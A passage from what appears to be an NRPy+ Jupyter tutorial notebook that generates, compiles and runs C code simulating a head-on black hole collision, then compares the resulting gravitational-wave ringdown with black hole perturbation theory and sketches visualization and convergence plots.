Nxx_plus_2NGHOSTS[2] * (g) ) ) ) #define IDX3(i,j,k) ( (i) + Nxx_plus_2NGHOSTS[0] * ( (j) + Nxx_plus_2NGHOSTS[1] * (k) ) ) // Assuming idx = IDX3(i,j,k). Much faster if idx can be reused over and over: #define IDX4pt(g,idx) ( (idx) + (Nxx_plus_2NGHOSTS[0]*Nxx_plus_2NGHOSTS[1]*Nxx_plus_2NGHOSTS[2]) * (g) ) // Step P6: Set #define's for BSSN gridfunctions. C code generated above #include "../CurviBoundaryConditions/gridfunction_defines.h" #define LOOP_REGION(i0min,i0max, i1min,i1max, i2min,i2max) \ for(int i2=i2min;i2<i2max;i2++) for(int i1=i1min;i1<i1max;i1++) for(int i0=i0min;i0<i0max;i0++) #define LOOP_ALL_GFS_GPS(ii) _Pragma("omp parallel for") \ for(int (ii)=0;(ii)<Nxx_plus_2NGHOSTS_tot*NUM_EVOL_GFS;(ii)++) void xxCart(REAL *xx[3],const int i0,const int i1,const int i2, REAL xCart[3]) { REAL xx0 = xx[0][i0]; REAL xx1 = xx[1][i1]; REAL xx2 = xx[2][i2]; #include "../CurviBoundaryConditions/xxCart.h" } // Step P7: Include basic functions needed to impose curvilinear // parity and boundary conditions. #include "../CurviBoundaryConditions/curvilinear_parity_and_outer_boundary_conditions.h" // Step P8: Include function for enforcing detgammabar constraint. #include "enforce_detgammabar_constraint.h" // Step P9: Find the CFL-constrained timestep REAL find_timestep(const int Nxx_plus_2NGHOSTS[3],const REAL dxx[3],REAL *xx[3], const REAL CFL_FACTOR) { const REAL dxx0 = dxx[0], dxx1 = dxx[1], dxx2 = dxx[2]; REAL dsmin = 1e38; // Start with a crazy high value... close to the largest number in single precision. LOOP_REGION(NGHOSTS,Nxx_plus_2NGHOSTS[0]-NGHOSTS, NGHOSTS,Nxx_plus_2NGHOSTS[1]-NGHOSTS, NGHOSTS,Nxx_plus_2NGHOSTS[2]-NGHOSTS) { const REAL xx0 = xx[0][i0], xx1 = xx[1][i1], xx2 = xx[2][i2]; REAL ds_dirn0, ds_dirn1, ds_dirn2; #include "ds_dirn.h" #define MIN(A, B) ( ((A) < (B)) ? (A) : (B) ) // Set dsmin = MIN(dsmin, ds_dirn0, ds_dirn1, ds_dirn2); dsmin = MIN(dsmin,MIN(ds_dirn0,MIN(ds_dirn1,ds_dirn2))); } return dsmin*CFL_FACTOR; } // Step P10: Declare function necessary for setting up the initial data. // Step P10.a: Define BSSN_ID() for BrillLindquist initial data #include "BrillLindquist.h" // Step P10.b: Set the generic driver function for setting up BSSN initial data void initial_data(const int Nxx_plus_2NGHOSTS[3],REAL *xx[3], REAL *in_gfs) { #pragma omp parallel for LOOP_REGION(0,Nxx_plus_2NGHOSTS[0], 0,Nxx_plus_2NGHOSTS[1], 0,Nxx_plus_2NGHOSTS[2]) { const int idx = IDX3(i0,i1,i2); BSSN_ID(xx[0][i0],xx[1][i1],xx[2][i2], &in_gfs[IDX4pt(HDD00GF,idx)],&in_gfs[IDX4pt(HDD01GF,idx)],&in_gfs[IDX4pt(HDD02GF,idx)], &in_gfs[IDX4pt(HDD11GF,idx)],&in_gfs[IDX4pt(HDD12GF,idx)],&in_gfs[IDX4pt(HDD22GF,idx)], &in_gfs[IDX4pt(ADD00GF,idx)],&in_gfs[IDX4pt(ADD01GF,idx)],&in_gfs[IDX4pt(ADD02GF,idx)], &in_gfs[IDX4pt(ADD11GF,idx)],&in_gfs[IDX4pt(ADD12GF,idx)],&in_gfs[IDX4pt(ADD22GF,idx)], &in_gfs[IDX4pt(TRKGF,idx)], &in_gfs[IDX4pt(LAMBDAU0GF,idx)],&in_gfs[IDX4pt(LAMBDAU1GF,idx)],&in_gfs[IDX4pt(LAMBDAU2GF,idx)], &in_gfs[IDX4pt(VETU0GF,idx)],&in_gfs[IDX4pt(VETU1GF,idx)],&in_gfs[IDX4pt(VETU2GF,idx)], &in_gfs[IDX4pt(BETU0GF,idx)],&in_gfs[IDX4pt(BETU1GF,idx)],&in_gfs[IDX4pt(BETU2GF,idx)], &in_gfs[IDX4pt(ALPHAGF,idx)],&in_gfs[IDX4pt(CFGF,idx)]); } } // Step P11: Declare function for evaluating Hamiltonian constraint (diagnostic) void Hamiltonian_constraint(const int Nxx[3],const int Nxx_plus_2NGHOSTS[3],const REAL dxx[3], REAL *xx[3], REAL *in_gfs, REAL *aux_gfs) { #include "Hamiltonian.h" } // Step P12: Declare function for evaluating real and imaginary parts of psi4 (diagnostic) void psi4(const int Nxx_plus_2NGHOSTS[3],const int i0,const int i1,const int i2, const REAL dxx[3], REAL *xx[3], REAL *in_gfs, REAL *aux_gfs) { const int idx = IDX3(i0,i1,i2); const REAL xx0 = xx[0][i0]; const REAL xx1 = xx[1][i1]; const REAL xx2 = xx[2][i2]; const REAL invdx0 = 1.0/dxx[0]; const REAL invdx1 = 1.0/dxx[1]; const REAL invdx2 = 1.0/dxx[2]; // REAL psi4_re_pt0,psi4_re_pt1,psi4_re_pt2; { #include "Psi4re_pt0_lowlevel.h" } { #include "Psi4re_pt1_lowlevel.h" } { #include "Psi4re_pt2_lowlevel.h" } // REAL psi4_im_pt0,psi4_im_pt1,psi4_im_pt2; { #include "Psi4im_pt0_lowlevel.h" } { #include "Psi4im_pt1_lowlevel.h" } { #include "Psi4im_pt2_lowlevel.h" } // aux_gfs[IDX4pt(PSI4RGF,idx)] = psi4_re_pt0 + psi4_re_pt1 + psi4_re_pt2; // aux_gfs[IDX4pt(PSI4IGF,idx)] = psi4_im_pt0 + psi4_im_pt1 + psi4_im_pt2; } // Step P13: Declare function to evaluate the BSSN RHSs void rhs_eval(const int Nxx[3],const int Nxx_plus_2NGHOSTS[3],const REAL dxx[3], REAL *xx[3], const REAL *in_gfs,REAL *rhs_gfs) { #include "BSSN_RHSs.h" } // main() function: // Step 0: Read command-line input, set up grid structure, allocate memory for gridfunctions, set up coordinates // Step 1: Set up initial data to an exact solution // Step 2: Start the timer, for keeping track of how fast the simulation is progressing. // Step 3: Integrate the initial data forward in time using the chosen RK-like Method of // Lines timestepping algorithm, and output periodic simulation diagnostics // Step 3.a: Output 2D data file periodically, for visualization // Step 3.b: Step forward one timestep (t -> t+dt) in time using // chosen RK-like MoL timestepping algorithm // Step 3.c: If t=t_final, output conformal factor & Hamiltonian // constraint violation to 2D data file // Step 3.d: Progress indicator printing to stderr // Step 4: Free all allocated memory int main(int argc, const char *argv[]) { // Step 0a: Read command-line input, error out if nonconformant if((argc != 4 && argc != 5) || atoi(argv[1]) < NGHOSTS || atoi(argv[2]) < NGHOSTS || atoi(argv[3]) < 2 /* FIXME; allow for axisymmetric sims */) { fprintf(stderr,"Error: Expected three command-line arguments: ./BrillLindquist_Playground Nx0 Nx1 Nx2,\n"); fprintf(stderr,"where Nx[0,1,2] is the number of grid points in the 0, 1, and 2 directions.\n"); fprintf(stderr,"Nx[] MUST BE larger than NGHOSTS (= %d)\n",NGHOSTS); exit(1); } if(argc == 5) { CFL_FACTOR = strtod(argv[4],NULL); if(CFL_FACTOR > 0.5 && atoi(argv[3])!=2) { fprintf(stderr,"WARNING: CFL_FACTOR was set to %e, which is > 0.5.\n",CFL_FACTOR); fprintf(stderr," This will generally only be stable if the simulation is purely axisymmetric\n"); fprintf(stderr," However, Nx2 was set to %d>2, which implies a non-axisymmetric simulation\n",atoi(argv[3])); } } // Step 0b: Set up numerical grid structure, first in space... const int Nxx[3] = { atoi(argv[1]), atoi(argv[2]), atoi(argv[3]) }; if(Nxx[0]%2 != 0 || Nxx[1]%2 != 0 || Nxx[2]%2 != 0) { fprintf(stderr,"Error: Cannot guarantee a proper cell-centered grid if number of grid cells not set to even number.\n"); fprintf(stderr," For example, in case of angular directions, proper symmetry zones will not exist.\n"); exit(1); } const int Nxx_plus_2NGHOSTS[3] = { Nxx[0]+2*NGHOSTS, Nxx[1]+2*NGHOSTS, Nxx[2]+2*NGHOSTS }; const int Nxx_plus_2NGHOSTS_tot = Nxx_plus_2NGHOSTS[0]*Nxx_plus_2NGHOSTS[1]*Nxx_plus_2NGHOSTS[2]; #include "xxminmax.h" // Step 0c: Allocate memory for gridfunctions #include "../MoLtimestepping/RK_Allocate_Memory.h" if(NUM_AUX_GFS > NUM_EVOL_GFS) { printf("Error: NUM_AUX_GFS > NUM_EVOL_GFS. Either reduce the number of auxiliary gridfunctions,\n"); printf(" or allocate (malloc) by hand storage for *diagnostic_output_gfs. \n"); exit(1); } // Step 0d: Set up space and time coordinates // Step 0d.i: Set \Delta x^i on uniform grids. REAL dxx[3]; for(int i=0;i<3;i++) dxx[i] = (xxmax[i] - xxmin[i]) / ((REAL)Nxx[i]); // Step 0d.ii: Set up uniform coordinate grids REAL *xx[3]; for(int i=0;i<3;i++) { xx[i] = (REAL *)malloc(sizeof(REAL)*Nxx_plus_2NGHOSTS[i]); for(int j=0;j<Nxx_plus_2NGHOSTS[i];j++) { xx[i][j] = xxmin[i] + ((REAL)(j-NGHOSTS) + (1.0/2.0))*dxx[i]; // Cell-centered grid. } } // Step 0d.iii: Set timestep based on smallest proper distance between gridpoints and CFL factor REAL dt = find_timestep(Nxx_plus_2NGHOSTS, dxx,xx, CFL_FACTOR); //printf("# Timestep set to = %e\n",(double)dt); int N_final = (int)(t_final / dt + 0.5); // The number of iterations in time. //Add 0.5 to account for C rounding down integers. REAL out_approx_every_t = 0.2; int N_output_every = (int)(out_approx_every_t*((REAL)N_final)/t_final); // Step 0e: Find ghostzone mappings and parities: gz_map *bc_gz_map = (gz_map *)malloc(sizeof(gz_map)*Nxx_plus_2NGHOSTS_tot); parity_condition *bc_parity_conditions = (parity_condition *)malloc(sizeof(parity_condition)*Nxx_plus_2NGHOSTS_tot); set_up_bc_gz_map_and_parity_conditions(Nxx_plus_2NGHOSTS,xx,dxx,xxmin,xxmax, bc_gz_map, bc_parity_conditions); // Step 1: Set up initial data to an exact solution initial_data(Nxx_plus_2NGHOSTS, xx, y_n_gfs); // Step 1b: Apply boundary conditions, as initial data // are sometimes ill-defined in ghost zones. // E.g., spherical initial data might not be // properly defined at points where r=-1. apply_bcs(Nxx, Nxx_plus_2NGHOSTS, bc_gz_map,bc_parity_conditions,NUM_EVOL_GFS,evol_gf_parity, y_n_gfs); enforce_detgammabar_constraint(Nxx_plus_2NGHOSTS, xx, y_n_gfs); // Step 2: Start the timer, for keeping track of how fast the simulation is progressing. #ifdef __linux__ // Use high-precision timer in Linux. struct timespec start, end; clock_gettime(CLOCK_REALTIME, &start); #else // Resort to low-resolution, standards-compliant timer in non-Linux OSs // http://www.cplusplus.com/reference/ctime/time/ time_t start_timer,end_timer; time(&start_timer); // Resolution of one second... #endif // Step 3: Integrate the initial data forward in time using the chosen RK-like Method of // Lines timestepping algorithm, and output periodic simulation diagnostics for(int n=0;n<=N_final;n++) { // Main loop to progress forward in time. /* Step 3.a: Output psi4 spin-weight -2 decomposed data, every N_output_every */ if(n%N_output_every == 0) { #include "../SpinWeight_minus2_SphHarmonics/SpinWeight_minus2_SphHarmonics.h" char filename[100]; //int r_ext_idx = (Nxx_plus_2NGHOSTS[0]-NGHOSTS)/4; for(int r_ext_idx = (Nxx_plus_2NGHOSTS[0]-NGHOSTS)/4; r_ext_idx<(Nxx_plus_2NGHOSTS[0]-NGHOSTS)*0.9;r_ext_idx+=5) { REAL r_ext; { REAL xx0 = xx[0][r_ext_idx]; REAL xx1 = xx[1][1]; REAL xx2 = xx[2][1]; REAL xCart[3]; #include "xxCart.h" r_ext = sqrt(xCart[0]*xCart[0] + xCart[1]*xCart[1] + xCart[2]*xCart[2]); } sprintf(filename,"outPsi4_l2m0-%d-r%.2f.txt",Nxx[0],(double)r_ext); FILE *outPsi4_l2m0; if(n==0) outPsi4_l2m0 = fopen(filename, "w"); else outPsi4_l2m0 = fopen(filename, "a"); REAL Psi4r_0pt_l2m0 = 0.0,Psi4r_1pt_l2m0 = 0.0,Psi4r_2pt_l2m0 = 0.0; REAL Psi4i_0pt_l2m0 = 0.0,Psi4i_1pt_l2m0 = 0.0,Psi4i_2pt_l2m0 = 0.0; LOOP_REGION(r_ext_idx,r_ext_idx+1, NGHOSTS,Nxx_plus_2NGHOSTS[1]-NGHOSTS, NGHOSTS,NGHOSTS+1) { psi4(Nxx_plus_2NGHOSTS, i0,i1,i2, dxx,xx, y_n_gfs, diagnostic_output_gfs); const int idx = IDX3(i0,i1,i2); const REAL th = xx[1][i1]; const REAL ph = xx[2][i2]; // Construct integrand for Psi4 spin-weight s=-2,l=2,m=0 spherical harmonic // Based on http://www.demonstrations.wolfram.com/SpinWeightedSphericalHarmonics/ // we have {}_{s}_Y_{lm} = {}_{-2}_Y_{20} = 1/4 * sqrt(15 / (2*pi)) * sin(th)^2 // Confirm integrand is correct: // Integrate[(1/4 Sqrt[15/(2 \[Pi])] Sin[th]^2) (1/4 Sqrt[15/(2 \[Pi])] Sin[th]^2)*2*Pi*Sin[th], {th, 0, Pi}] // ^^^ equals 1. REAL ReY_sm2_l2_m0,ImY_sm2_l2_m0; SpinWeight_minus2_SphHarmonics(2,0, th,ph, &ReY_sm2_l2_m0,&ImY_sm2_l2_m0); const REAL sinth = sin(xx[1][i1]); /* psi4 *{}_{-2}_Y_{20}* (int dphi)* sinth*dtheta */ Psi4r_0pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4R_0PTGF,idx)]*ReY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4r_1pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4R_1PTGF,idx)]*ReY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4r_2pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4R_2PTGF,idx)]*ReY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4i_0pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4I_0PTGF,idx)]*ImY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4i_1pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4I_1PTGF,idx)]*ImY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4i_2pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4I_2PTGF,idx)]*ImY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; } fprintf(outPsi4_l2m0,"%e %.15e %.15e %.15e %.15e %.15e %.15e\n", (double)((n)*dt), (double)Psi4r_0pt_l2m0,(double)Psi4r_1pt_l2m0,(double)Psi4r_2pt_l2m0, (double)Psi4i_0pt_l2m0,(double)Psi4i_1pt_l2m0,(double)Psi4i_2pt_l2m0); fclose(outPsi4_l2m0); } // Evaluate Hamiltonian constraint violation Hamiltonian_constraint(Nxx,Nxx_plus_2NGHOSTS,dxx, xx, y_n_gfs, diagnostic_output_gfs); sprintf(filename,"out1D-%d.txt",Nxx[0]); FILE *out2D; if(n==0) out2D = fopen(filename, "w"); else out2D = fopen(filename, "a"); LOOP_REGION(NGHOSTS,Nxx_plus_2NGHOSTS[0]-NGHOSTS, Nxx_plus_2NGHOSTS[1]/2,Nxx_plus_2NGHOSTS[1]/2+1, Nxx_plus_2NGHOSTS[2]/2,Nxx_plus_2NGHOSTS[2]/2+1) { const int idx = IDX3(i0,i1,i2); REAL xx0 = xx[0][i0]; REAL xx1 = xx[1][i1]; REAL xx2 = xx[2][i2]; REAL xCart[3]; #include "xxCart.h" fprintf(out2D,"%e %e %e\n", (double)sqrt(xCart[0]*xCart[0] + xCart[1]*xCart[1] + xCart[2]*xCart[2]), (double)y_n_gfs[IDX4pt(CFGF,idx)],(double)log10(fabs(diagnostic_output_gfs[IDX4pt(HGF,idx)]))); } fprintf(out2D,"\n\n"); fclose(out2D); } // Step 3.b: Step forward one timestep (t -> t+dt) in time using // chosen RK-like MoL timestepping algorithm #include "../MoLtimestepping/RK_MoL.h" // Step 3.c: If t=t_final, output conformal factor & Hamiltonian // constraint violation to 2D data file if(n==N_final-1) { // Evaluate Hamiltonian constraint violation Hamiltonian_constraint(Nxx,Nxx_plus_2NGHOSTS,dxx, xx, y_n_gfs, diagnostic_output_gfs); char filename[100]; sprintf(filename,"out%d.txt",Nxx[0]); FILE *out2D = fopen(filename, "w"); const int i0MIN=NGHOSTS; // In spherical, r=Delta r/2. const int i1mid=Nxx_plus_2NGHOSTS[1]/2; const int i2mid=Nxx_plus_2NGHOSTS[2]/2; LOOP_REGION(NGHOSTS,Nxx_plus_2NGHOSTS[0]-NGHOSTS, NGHOSTS,Nxx_plus_2NGHOSTS[1]-NGHOSTS, NGHOSTS,Nxx_plus_2NGHOSTS[2]-NGHOSTS) { REAL xx0 = xx[0][i0]; REAL xx1 = xx[1][i1]; REAL xx2 = xx[2][i2]; REAL xCart[3]; #include "xxCart.h" int idx = IDX3(i0,i1,i2); fprintf(out2D,"%e %e %e %e\n",xCart[1],xCart[2], y_n_gfs[IDX4pt(CFGF,idx)], log10(fabs(diagnostic_output_gfs[IDX4pt(HGF,idx)]))); } fclose(out2D); } // Step 3.d: Progress indicator printing to stderr // Step 3.d.i: Measure average time per iteration #ifdef __linux__ // Use high-precision timer in Linux. clock_gettime(CLOCK_REALTIME, &end); const long long unsigned int time_in_ns = 1000000000L * (end.tv_sec - start.tv_sec) + end.tv_nsec - start.tv_nsec; #else // Resort to low-resolution, standards-compliant timer in non-Linux OSs time(&end_timer); // Resolution of one second... REAL time_in_ns = difftime(end_timer,start_timer)*1.0e9+0.5; // Round up to avoid divide-by-zero. #endif const REAL s_per_iteration_avg = ((REAL)time_in_ns / (REAL)n) / 1.0e9; const int iterations_remaining = N_final - n; const REAL time_remaining_in_mins = s_per_iteration_avg * (REAL)iterations_remaining / 60.0; const REAL num_RHS_pt_evals = (REAL)(Nxx[0]*Nxx[1]*Nxx[2]) * 4.0 * (REAL)n; // 4 RHS evals per gridpoint for RK4 const REAL RHS_pt_evals_per_sec = num_RHS_pt_evals / ((REAL)time_in_ns / 1.0e9); // Step 3.d.ii: Output simulation progress to stderr if(n % 10 == 0) { fprintf(stderr,"%c[2K", 27); // Clear the line fprintf(stderr,"It: %d t=%.2f dt=%.2e | %.1f%%; ETA %.0f s | t/h %.2f | gp/s %.2e\r", // \r is carriage return, move cursor to the beginning of the line n, n * (double)dt, (double)dt, (double)(100.0 * (REAL)n / (REAL)N_final), (double)time_remaining_in_mins*60, (double)(dt * 3600.0 / s_per_iteration_avg), (double)RHS_pt_evals_per_sec); fflush(stderr); // Flush the stderr buffer } // End progress indicator if(n % 10 == 0) } // End main loop to progress forward in time. fprintf(stderr,"\n"); // Clear the final line of output from progress indicator. // Step 4: Free all allocated memory free(bc_parity_conditions); free(bc_gz_map); #include "../MoLtimestepping/RK_Free_Memory.h" for(int i=0;i<3;i++) free(xx[i]); return 0; } # + # Nr = 270 # Ntheta = 8 Nr = 800 Ntheta = 16 CFL_FACTOR = 1.0 import cmdline_helper as cmd print("Now compiling, should take ~10 seconds...\n") start = time.time() cmd.C_compile("BSSN/BrillLindquist_Playground.c", "BrillLindquist_Playground") end = time.time() print("Finished in "+str(end-start)+" seconds.\n\n") if Nr == 800: print("Now running. Should take ~8 hours...\n") if Nr == 270: print("Now running. Should take ~30 minutes...\n") start = time.time() cmd.delete_existing_files("out*.txt") cmd.delete_existing_files("out*.png") cmd.Execute("BrillLindquist_Playground", str(Nr)+" "+str(Ntheta)+" 2 "+str(CFL_FACTOR)) end = time.time() print("Finished in "+str(end-start)+" seconds.\n\n") # - # <a id='compare'></a> # # # Step 8: Comparison with black hole perturbation theory \[Back to [top](#toc)\] # $$\label{compare}$$ # # According to black hole perturbation theory ([Berti et al](https://arxiv.org/abs/0905.2975)), the resultant black hole should ring down with dominant, spin-weight $s=-2$ spherical harmonic mode $(l=2,m=0)$ according to # # $$ # {}_{s=-2}\text{Re}(\psi_4)_{l=2,m=0} = A e^{−0.0890 t/M} \cos(0.3737 t/M+ \phi), # $$ # # where $M=1$ for these data, and $A$ and $\phi$ are an arbitrary amplitude and phase, respectively. Here we will plot the resulting waveform at $r/M=33.13$, comparing to the expected frequency and amplitude falloff predicted by black hole perturbation theory. # # Notice that we find about 4.2 orders of magnitude agreement! If you are willing to invest more resources and wait much longer, you will find approximately 8.5 orders of magnitude agreement (*better* than Fig 6 of [Ruchlin et al](https://arxiv.org/pdf/1712.07658.pdf)) if you adjust the above code parameters such that # # 1. Finite-differencing order is set to 10 # 1. Nr = 800 # 1. Ntheta = 16 # 1. Outer boundary (`AMPL`) set to 300 # 1. Final time (`t_final`) set to 275 # 1. Set the initial positions of the BHs to `BH1_posn_z = -BH2_posn_z = 0.25` # + # %matplotlib inline import numpy as np # from scipy.interpolate import griddata import matplotlib.pyplot as plt from matplotlib.pyplot import savefig # from IPython.display import HTML # import matplotlib.image as mgimg from matplotlib import rc rc('text', usetex=True) if Nr == 270: extraction_radius = "33.13" Amplitude = 7e-2 Phase = 2.8 elif Nr == 800: extraction_radius = "33.64" Amplitude = 1.8e-2 Phase = 2.8 else: print("Error: output is not tuned for Nr = "+str(Nr)+" . Plotting disabled.") exit(1) #Transposed for easier unpacking: t,psi4r1,psi4r2,psi4r3,psi4i1,psi4i2,psi4i3 = np.loadtxt("outPsi4_l2m0-"+str(Nr)+"-r"+extraction_radius+".txt").T t_retarded = [] log10abspsi4r = [] bh_pert_thry = [] for i in range(len(psi4r1)): retarded_time = t[i]-np.float(extraction_radius) t_retarded.append(retarded_time) log10abspsi4r.append(np.log(np.float(extraction_radius)*np.abs(psi4r1[i] + psi4r2[i] + psi4r3[i]))/np.log(10)) bh_pert_thry.append(np.log(Amplitude*np.exp(-0.0890*retarded_time)*np.abs(np.cos(0.3737*retarded_time+Phase)))/np.log(10)) # print(bh_pert_thry) fig, ax = plt.subplots() plt.title("Grav. Wave Agreement with BH perturbation theory",fontsize=18) plt.xlabel("$(t - R_{ext})/M$",fontsize=16) plt.ylabel('$\log_{10}|\psi_4|$',fontsize=16) ax.plot(t_retarded, log10abspsi4r, 'k-', label='SENR/NRPy+ simulation') ax.plot(t_retarded, bh_pert_thry, 'k--', label='BH perturbation theory') #ax.set_xlim([0,t_retarded[len(psi4r1)-1]]) ax.set_xlim([0,240]) ax.set_ylim([-13,-1.5]) plt.xticks(size = 14) plt.yticks(size = 14) legend = ax.legend(loc='upper right', shadow=True, fontsize='x-large') legend.get_frame().set_facecolor('C1') plt.show() # Note that you'll need `dvipng` installed to generate the following file: savefig("BHperttheorycompare.png",dpi=150) # - # <a id='visual'></a> # # # Step 9: Data Visualization Animations \[Back to [top](#toc)\] # $$\label{visual}$$ # # <a id='installdownload'></a> # # ## Step 9.a: Install `scipy` and download `ffmpeg` if they are not yet installed/downloaded \[Back to [top](#toc)\] # $$\label{installdownload}$$ # # Note that if you are not running this within `mybinder`, but on a Windows system, `ffmpeg` must be installed using a separate package (on [this site](http://ffmpeg.org/)), or (if running Jupyter within Anaconda, use the command: `conda install -c conda-forge ffmpeg`). # + # print("Ignore any warnings or errors from the following command:") # # !pip install scipy > /dev/null # # check_for_ffmpeg = !which ffmpeg >/dev/null && echo $? # if check_for_ffmpeg != ['0']: # print("Couldn't find ffmpeg, so I'll download it.") # # Courtesy https://johnvansickle.com/ffmpeg/ # # !wget http://astro.phys.wvu.edu/zetienne/ffmpeg-static-amd64-johnvansickle.tar.xz # # !tar Jxf ffmpeg-static-amd64-johnvansickle.tar.xz # print("Copying ffmpeg to ~/.local/bin/. Assumes ~/.local/bin is in the PATH.") # # !mkdir ~/.local/bin/ # # !cp ffmpeg-static-amd64-johnvansickle/ffmpeg ~/.local/bin/ # print("If this doesn't work, then install ffmpeg yourself. It should work fine on mybinder.") # - # <a id='genimages'></a> # # ## Step 9.b: Generate images for visualization animation \[Back to [top](#toc)\] # $$\label{genimages}$$ # # Here we loop through the data files output by the executable compiled and run in [the previous step](#mainc), generating a [png](https://en.wikipedia.org/wiki/Portable_Network_Graphics) image for each data file. # # **Special thanks to <NAME>. His work with the first versions of these scripts greatly contributed to the scripts as they exist below.** # + # ## VISUALIZATION ANIMATION, PART 1: Generate PNGs, one per frame of movie ## # import numpy as np # from scipy.interpolate import griddata # import matplotlib.pyplot as plt # from matplotlib.pyplot import savefig # from IPython.display import HTML # import matplotlib.image as mgimg # import glob # import sys # from matplotlib import animation # globby = glob.glob('out96-00*.txt') # file_list = [] # for x in sorted(globby): # file_list.append(x) # bound=1.4 # pl_xmin = -bound # pl_xmax = +bound # pl_ymin = -bound # pl_ymax = +bound # for filename in file_list: # fig = plt.figure() # x,y,cf,Ham = np.loadtxt(filename).T #Transposed for easier unpacking # plotquantity = cf # plotdescription = "Numerical Soln." # plt.title("Black Hole Head-on Collision (conf factor)") # plt.xlabel("y/M") # plt.ylabel("z/M") # grid_x, grid_y = np.mgrid[pl_xmin:pl_xmax:300j, pl_ymin:pl_ymax:300j] # points = np.zeros((len(x), 2)) # for i in range(len(x)): # # Zach says: No idea why x and y get flipped... # points[i][0] = y[i] # points[i][1] = x[i] # grid = griddata(points, plotquantity, (grid_x, grid_y), method='nearest') # gridcub = griddata(points, plotquantity, (grid_x, grid_y), method='cubic') # im = plt.imshow(gridcub, extent=(pl_xmin,pl_xmax, pl_ymin,pl_ymax)) # ax = plt.colorbar() # ax.set_label(plotdescription) # savefig(filename+".png",dpi=150) # plt.close(fig) # sys.stdout.write("%c[2K" % 27) # sys.stdout.write("Processing file "+filename+"\r") # sys.stdout.flush() # - # <a id='genvideo'></a> # # ## Step 9.c: Generate visualization animation \[Back to [top](#toc)\] # $$\label{genvideo}$$ # # In the following step, [ffmpeg](http://ffmpeg.org) is used to generate an [mp4](https://en.wikipedia.org/wiki/MPEG-4) video file, which can be played directly from this Jupyter notebook. # + # ## VISUALIZATION ANIMATION, PART 2: Combine PNGs to generate movie ## # # https://stackoverflow.com/questions/14908576/how-to-remove-frame-from-matplotlib-pyplot-figure-vs-matplotlib-figure-frame # # https://stackoverflow.com/questions/23176161/animating-pngs-in-matplotlib-using-artistanimation # fig = plt.figure(frameon=False) # ax = fig.add_axes([0, 0, 1, 1]) # ax.axis('off') # myimages = [] # for i in range(len(file_list)): # img = mgimg.imread(file_list[i]+".png") # imgplot = plt.imshow(img) # myimages.append([imgplot]) # ani = animation.ArtistAnimation(fig, myimages, interval=100, repeat_delay=1000) # plt.close() # ani.save('BH_Head-on_Collision.mp4', fps=5,dpi=150) # + ## VISUALIZATION ANIMATION, PART 3: Display movie as embedded HTML5 (see next cell) ## # https://stackoverflow.com/questions/18019477/how-can-i-play-a-local-video-in-my-ipython-notebook # + # # %%HTML # <video width="480" height="360" controls> # <source src="BH_Head-on_Collision.mp4" type="video/mp4"> # </video> # - # <a id='convergence'></a> # # # Step 10: Visualize the numerical error, and confirm that it converges to zero with increasing numerical resolution (sampling) \[Back to [top](#toc)\] # $$\label{convergence}$$ # + # x96,y96,valuesCF96,valuesHam96 = np.loadtxt('out96.txt').T #Transposed for easier unpacking # pl_xmin = -2.5 # pl_xmax = +2.5 # pl_ymin = -2.5 # pl_ymax = +2.5 # grid_x, grid_y = np.mgrid[pl_xmin:pl_xmax:100j, pl_ymin:pl_ymax:100j] # points96 = np.zeros((len(x96), 2)) # for i in range(len(x96)): # points96[i][0] = x96[i] # points96[i][1] = y96[i] # grid96 = griddata(points96, valuesCF96, (grid_x, grid_y), method='nearest') # grid96cub = griddata(points96, valuesCF96, (grid_x, grid_y), method='cubic') # grid96 = griddata(points96, valuesHam96, (grid_x, grid_y), method='nearest') # grid96cub = griddata(points96, valuesHam96, (grid_x, grid_y), method='cubic') # # fig, ax = plt.subplots() # plt.clf() # plt.title("96x16 Num. Err.: log_{10}|Ham|") # plt.xlabel("x/M") # plt.ylabel("z/M") # fig96cub = plt.imshow(grid96cub.T, extent=(pl_xmin,pl_xmax, pl_ymin,pl_ymax)) # cb = plt.colorbar(fig96cub) # + # x72,y72,valuesCF72,valuesHam72 = np.loadtxt('out72.txt').T #Transposed for easier unpacking # points72 = np.zeros((len(x72), 2)) # for i in range(len(x72)): # points72[i][0] = x72[i] # points72[i][1] = y72[i] # grid72 = griddata(points72, valuesHam72, (grid_x, grid_y), method='nearest') # griddiff_72_minus_96 = np.zeros((100,100)) # griddiff_72_minus_96_1darray = np.zeros(100*100) # gridx_1darray_yeq0 = np.zeros(100) # grid72_1darray_yeq0 = np.zeros(100) # grid96_1darray_yeq0 = np.zeros(100) # count = 0 # for i in range(100): # for j in range(100): # griddiff_72_minus_96[i][j] = grid72[i][j] - grid96[i][j] # griddiff_72_minus_96_1darray[count] = griddiff_72_minus_96[i][j] # if j==49: # gridx_1darray_yeq0[i] = grid_x[i][j] # grid72_1darray_yeq0[i] = grid72[i][j] + np.log10((72./96.)**4) # grid96_1darray_yeq0[i] = grid96[i][j] # count = count + 1 # plt.clf() # fig, ax = plt.subplots() # plt.title("4th-order Convergence, at t/M=7.5 (post-merger; horiz at x/M=+/-1)") # plt.xlabel("x/M") # plt.ylabel("log10(Relative error)") # ax.plot(gridx_1darray_yeq0, grid96_1darray_yeq0, 'k-', label='Nr=96') # ax.plot(gridx_1darray_yeq0, grid72_1darray_yeq0, 'k--', label='Nr=72, mult by (72/96)^4') # ax.set_ylim([-8.5,0.5]) # legend = ax.legend(loc='lower right', shadow=True, fontsize='x-large') # legend.get_frame().set_facecolor('C1') # plt.show() # - # <a id='latex_pdf_output'></a> # # # Step 11: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\] # $$\label{latex_pdf_output}$$ # # The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename # 